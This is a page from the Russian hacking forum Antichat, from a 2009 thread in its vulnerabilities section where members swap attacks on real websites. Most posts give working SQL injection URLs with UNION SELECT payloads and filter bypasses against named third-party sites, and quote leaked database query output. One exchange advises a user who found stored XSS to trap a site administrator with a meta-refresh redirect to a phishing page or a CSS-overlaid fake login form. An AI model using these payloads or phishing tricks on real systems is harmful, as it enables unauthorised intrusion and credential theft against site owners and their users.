ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4641  
Старый 12.01.2009, 21:50
Аватар для geforce
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686

Репутация: -25
Отправить сообщение для geforce с помощью ICQ
Question

Цитата:
Сообщение от R1dex  
Кто "он"?


ЗЫ: Сверху уже два раза раскрутили эту скулю ^^
Сори! Не увидел! он это запрос к базе! Фильтруется /*!

1. там закрыт доступ к
Код:
  http://www.bethinking.org/resource.php?ID=233'+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,AES_DECRYPT(AES_ENCRYPT(table_name,1),1),18,19+from+information_schema.tables--+
пишет:
Access denied for user 'uccfapologist'@'server1.uccf.org.uk' to database 'information_schema'

Как тогда посмотреть содерживое скулы только на угад?

Последний раз редактировалось geforce; 12.01.2009 в 21:52..
 
Ответить с цитированием

  #4642  
Старый 12.01.2009, 22:00
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Там 4 ветка )
http://www.bethinking.org/resource.php?ID=233'+union+select+1,UNHEX(HEX(vers ion())),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19--+
 
Ответить с цитированием

  #4643  
Старый 12.01.2009, 22:16
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

2 AkyHa_MaTaTa:

не что-то, а именно в данном конкретном случае катит /**/
 
Ответить с цитированием

  #4644  
Старый 13.01.2009, 11:38
Аватар для z00MAN
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Код:
http://www.aperitif.no/?id=13'
редирект
Код:
http://www.aperitif.no/?id=13+order+by+3--
главная страница + ошибки
вывод сделать не получается, все время редирект
 
Ответить с цитированием

  #4645  
Старый 13.01.2009, 15:07
Аватар для Mixon
Mixon
Участник форума
Регистрация: 12.03.2008
Сообщений: 254
Провел на форуме:
12333903

Репутация: 238
Отправить сообщение для Mixon с помощью ICQ
По умолчанию

Есть такой вопрос,вопшем я нашел активную хсс,вот только дело в том что я тому админу которому на ету страницу зову,то он с телефона! а яваскрипт то там неработает,что можно придумать?????плиз,скорее....((
 
Ответить с цитированием

  #4646  
Старый 13.01.2009, 15:26
Аватар для Qwazar
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

Цитата:
Сообщение от Mixon  
Есть такой вопрос,вопшем я нашел активную хсс,вот только дело в том что я тому админу которому на ету страницу зову,то он с телефона! а яваскрипт то там неработает,что можно придумать?????плиз,скорее....((
Можно редиректнуть его на фейк через META refresh
Код:
<meta http-equiv="refresh" content="0;url=http://урл_фейка/" />
или

можно попробовать стилями (CSS) спрятать поле куда логин пароль вводится и отпозиционировать туда свою форму с вводом логина-пароля и другим action (ну и всё указывающее на то что он уже залогинен тоже спрятать).

Хотя это муторно и не факт, что реализуемо на практике, но просто идея (Зато без скриптов )
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.

Последний раз редактировалось Qwazar; 13.01.2009 в 15:35..
 
Ответить с цитированием

  #4647  
Старый 13.01.2009, 15:29
Аватар для Mixon
Mixon
Участник форума
Регистрация: 12.03.2008
Сообщений: 254
Провел на форуме:
12333903

Репутация: 238
Отправить сообщение для Mixon с помощью ICQ
По умолчанию

Цитата:
Сообщение от Qwazar  
Можно попробовать стилями (CSS) спрятать поле куда логин пароль вводится и отпозиционировать туда свою форму с вводом логина-пароля и другим action (ну и всё указывающее на то что он уже залогинен тоже спрятать).

Хотя это муторно и не факт, что реализуемо на практике, но просто идея (Зато без скриптов )
Ты хоть сам понял что написал? вопше хсс в основе не определенной странице,и точно что не на вводе логина и пасса,и думаешь ето АДМИНУ ЕТОГО САЙТА будет так беспотпально то что я сделаю?...
 
Ответить с цитированием

  #4648  
Старый 13.01.2009, 15:31
Аватар для AkyHa_MaTaTa
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

Цитата:
Сообщение от Pashkela  
2 AkyHa_MaTaTa:

не что-то, а именно в данном конкретном случае катит /**/
не согласен, давай проведем маленький экспиремент, и так смотри, я буду основываться на показываемой ошибке как конечном результате, и так смотрем гверю:

http://www.dance4you.ru/teachers/info/data/ic_6/-381'

Цитата:
SELECT A.id,
A.parent_id,
UNIX_TIMESTAMP(A.cdate) as cdate, UNIX_TIMESTAMP(A.mdate) as mdate,
A.ip,
B.var,
B.data
FROM sapi_tree A,
sapi_data B
WHERE A.id=B.parent_id
AND
A.id=-381'
и так судя по всему 7 колонок выбераеться,
и так вызываем ошибку и пробуем посмотреть
http://www.dance4you.ru/teachers/info/data/ic_6/-381'/**/union/**/select/**/1,2,3,4,5,6,7,2,3,4,5,6--
и имеем в ответ

SELECT A.id, A.parent_id, UNIX_TIMESTAMP(A.cdate) as cdate, UNIX_TIMESTAMP(A.mdate) as mdate, A.ip, B.var, B.data FROM sapi_tree A, sapi_data B WHERE A.id=B.parent_id AND A.id=-381'

то есть кавычка прошла а все остольное нет и что бы в это убедиться смотрем так
http://www.dance4you.ru/teachers/info/data/ic_6/-381'+union+select/**/1,2,3,4,5,6,7,2,3,4,5,6--

SELECT A.id, A.parent_id, UNIX_TIMESTAMP(A.cdate) as cdate, UNIX_TIMESTAMP(A.mdate) as mdate, A.ip, B.var, B.data FROM sapi_tree A, sapi_data B WHERE A.id=B.parent_id AND A.id=-381'+union+select

то все что до /**/ проходит в переменую и вставляеться в гверю а все остольное нет, по все видимости в .htacess ишет значения переменой именно между / / и вставляет ее в запрос, сорее всего,как написал l1ght, только прямое обрашения к скрипту даст какой то результат.

Последний раз редактировалось AkyHa_MaTaTa; 13.01.2009 в 15:34..
 
Ответить с цитированием

  #4649  
Старый 13.01.2009, 15:32
Аватар для Qwazar
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

Цитата:
Сообщение от Mixon  
Ты хоть сам понял что написал? вопше хсс в основе не определенной странице,и точно что не на вводе логина и пасса,и думаешь ето АДМИНУ ЕТОГО САЙТА будет так беспотпально то что я сделаю?...
Я даже твой пост с трудом понимаю из-за количества ашипок.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием

  #4650  
Старый 13.01.2009, 15:37
Аватар для Mixon
Mixon
Участник форума
Регистрация: 12.03.2008
Сообщений: 254
Провел на форуме:
12333903

Репутация: 238
Отправить сообщение для Mixon с помощью ICQ
По умолчанию

Ну,я так пишу,такой лексикон у мну,ничё тут не сделаешь...) вопщем та идея с css никак не прокатит вопше......надо чтото другое думать(( Вопшем тут такой баг,тут с редактироваем инфы,поле Имя заносится в mysql,и в нем можно любой код писать,там без фильтров всё,xss отлично работает,ну вот что можно бы придумать окроме xss? потому что ето вап сайт,и тут хсс почти бесполезно,потому что там почти все с телфонов,где яваскрипт не идет...(

Последний раз редактировалось Mixon; 13.01.2009 в 15:42..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ